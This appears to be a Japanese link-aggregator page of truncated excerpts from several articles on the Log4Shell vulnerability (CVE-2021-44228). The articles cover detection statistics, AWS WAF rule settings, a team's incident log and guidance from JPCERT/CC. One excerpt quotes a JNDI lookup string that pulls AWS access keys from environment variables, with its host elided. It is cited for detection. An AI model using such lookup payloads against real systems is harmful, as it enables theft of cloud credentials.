オンプレミスからクラウドへの移行をはじめ、ハイブリッドクラウド環境をシームレスに保護しながら、クラウドの利点を実現します。 詳しくはこちら
「Log4j」の脆弱性が公開されて1カ月以上が過ぎた。現在のところ、大規模な悪用被害は発表されていないが、対象範囲が非常に広く、深刻な影響を受ける可能性があるため、各所から注意喚起が発表されている。ここでは、検知状況や対策状況についてまとめる。 Log4jの脆弱性への対応の難しさ Log4jとは、Apacheが提供するデータログ生成・記録APIである。このLog4j(正しくはそのバージョン2系である「Log4j 2」)に、リモートコード実行という深刻な脆弱性が確認された。リモートコード実行とは、脆弱性のあるシステムに対して遠隔から任意のコードを実行できる、つまり乗っ取りが可能な脆弱性であり、非常に深刻度が高い。 ただし、このレベルの脆弱性は決して珍しいものではない。年に数回は発見されるレベルである。Log4jの脆弱性が話題になっているのは、汎用性が高くさまざまな環境に存在するためだ。Log
Log4j 脆弱性対策としてAWSブログで紹介されているAWS WAFのマネージドルールを利用した当ブログサイト(DevelopersIO)の保護設定と、副作用対策について紹介します。 AWSチームのすずきです。 AWSブログで紹介されている、Log4j 脆弱性対策として紹介されているマネージドルール「Log4JRCE」「AnonymouousIPList」「sizeRestrictions_BODY」を利用して、 当ブログサイト(DevelopersIO)の保護を行う機会がありました。 この過程で行ったマネージドルールの評価と、誤検知による副作用を回避する設定について紹介させて頂きます。 評価環境設定 先に紹介した「Log4JRCE」を含む AWSManagedRulesknownBadInputsRuleSet に加え、AWSManagedRulesCommonRuleSet、AWSM
先日全世界を揺るがせたLog4jの脆弱性(通称Log4Shell)に対して、開発チームとしてどのように立ち回ったのか、その記録です。 2021/12/9に報告され、全世界を揺るがせたApache Log4jの脆弱性 CVE-2021-44228 ですが、我々prismatix事業部もその例外ではありませんでした。 脆弱性が判明した直後から、チームとして様々な対応を行っていましたが、一旦開発チームとしては状況が落ち着いています。このエントリでは、脆弱性に対してチームがどのように立ち回ったのか、記録を残しておきます。 最初の一報 12/10の朝、チームメンバーの藤村が、下記のtwitterにてlog4j2にRCEがあることを知り、Slackでチームに共有しました。 log4j2 って使ってましたっけ?RCE が見つかってやばいという話が出てる。 RCE in #Log4j2 #security
ESETは、Log4Shellの深刻な脆弱性を狙った数十万回もの攻撃試行を検出しました。攻撃試行の大半は米国を標的としており、次いで英国、オランダ、チェコとなっています。世界中のシステムでLog4jソフトウェアライブラリが普及しているため、およそ180の国と地域が攻撃を受けていることが確認できました。 広範囲で攻撃試行が展開されている理由 Log4jソフトウェアライブラリは、デバイス上でのアクティビティをログとして記録するために極めて広い範囲で利用されており、特に、エラーの記録とセキュリティインシデントを遡って調査するための記録として利用されています。そのため、この脆弱性は極めて広範囲に影響しています。 この脆弱性は、デバイス上であらゆるコードをリモートで実行し、最終的にはすべてのコントロールを獲得することができます。もし攻撃者がこの方法でサーバーを侵害した場合、組織の内部ネットワークに深
広範囲で攻撃試行が展開されている理由 Log4jソフトウェアライブラリは、デバイス上でのアクティビティをログとして記録するために極めて広い範囲で利用されており、特に、エラーの記録とセキュリティインシデントを遡って調査するための記録として利用されています。そのため、この脆弱性は極めて広範囲に影響しています。 この脆弱性は、デバイス上であらゆるコードをリモートで実行し、最終的にはすべてのコントロールを獲得することができます。もし攻撃者がこの方法でサーバーを侵害した場合、組織の内部ネットワークに深く入り込み、インターネットにさらされていないほかのシステムやデバイスに侵入する可能性があります。Log4jの高い普及率と組み合わせると、これは深刻な脆弱性となり、脆弱性評価システムであるCVSSで10ポイント中最大スコアである10が付与されました。もしIT部門が迅速に対応できない場合、莫大な数の組織、独
2021年12月に発見されたLog4Shell(CVE-2021-44228)は、その年を代表する脆弱性として、たちまち悪名を馳せました。Apache Foundationは発見後まもなくパッチをリリースしましたが、この脆弱性は依然として個人や組織にとって大きな脅威となっています。 Log4Shellはリモートコード実行(RCE)の脆弱性で、CVSSスコアは10点満点中10点となっています。サーバー上で悪用された場合、攻撃者が任意のコードを実行し、システムの制御を握る可能性があります。標的のシステムを完全に掌握できるだけでなく、悪用が容易であるため、サイバー犯罪者にとってこの脆弱性は非常に魅力的です。 Log4Shell悪用の試みの現状 昨年12月に初めて報告されて以降、カスペルスキー製品は、Log4Shellの脆弱性をターゲットにデバイスをスキャンして攻撃を仕掛ける試み154,098件を
英国国民保険サービス(NHS:National Health Service)のデジタル分野を担当するNHS Digitalは、コネクションサーバ「VMware Horizons Connection Server」に含まれる「Apache Log4j」(以下、Log4j)の脆弱(ぜいじゃく)性を標的にしたサイバー攻撃に関する情報を更新した。 上記情報は2022年1月5日(現地時間)に公開されたものだが、同年1月24日(現地時間)にアップデートされており、ファイルの改変を検出するための「PowerShellコマンド」が更新されている。 Log4jの脆弱性、通常「Log4Shell」の影響範囲は多岐にわたるが、2022年1月に入ってから特にVMware Horizon Connection Serverに含まれるLog4jの脆弱性を標的としたサイバー攻撃が続いており、ソフトウェアベンダーや各
IPアドレスは、ELB (国内向)、Global Accelerator(海外向) のIPアドレスで利用中のものでした。 $ host 75.2.71.201 201.71.2.75.in-addr.arpa domain name pointer a5b041b48e73d3807.awsglobalaccelerator.com. $ host 52.194.15.214 214.15.194.52.in-addr.arpa domain name pointer ec2-52-194-15-214.ap-northeast-1.compute.amazonaws.com. $ host dev.classmethod.jp dev.classmethod.jp has address 75.2.71.201 dev.classmethod.jp has address 99.83.1
また、JPCERT/CCのハニーポットでは観測されていませんが、AWSのアクセスキー情報を環境変数から窃取しようとする以下の攻撃文字列が存在していることも確認しています。 ${jndi:ldap://${env:AWS_ACCESS_KEY}.(略)} 被害の確認および対処 log4j2は採用事例が非常に多く、また自身がlog4jをプログラムに取り込んだ覚えがなくとも、使用しているライブラリ内に内包されているケースも多くあるものと考えられます。影響確認においては、自組織で用いられているソフトウェア資産の整理もさることながら、既に不正なアクセスが行われているという想定のもと、システム内に不審なファイル等が配置されていないか、また不審な宛先に対して通信が発生していないか確認し、冷静にシステムのアップデートまた回避策の適用を実施していただきたいと思います。 参考情報 [1] Log4j Apac
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
処理を実行中です
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く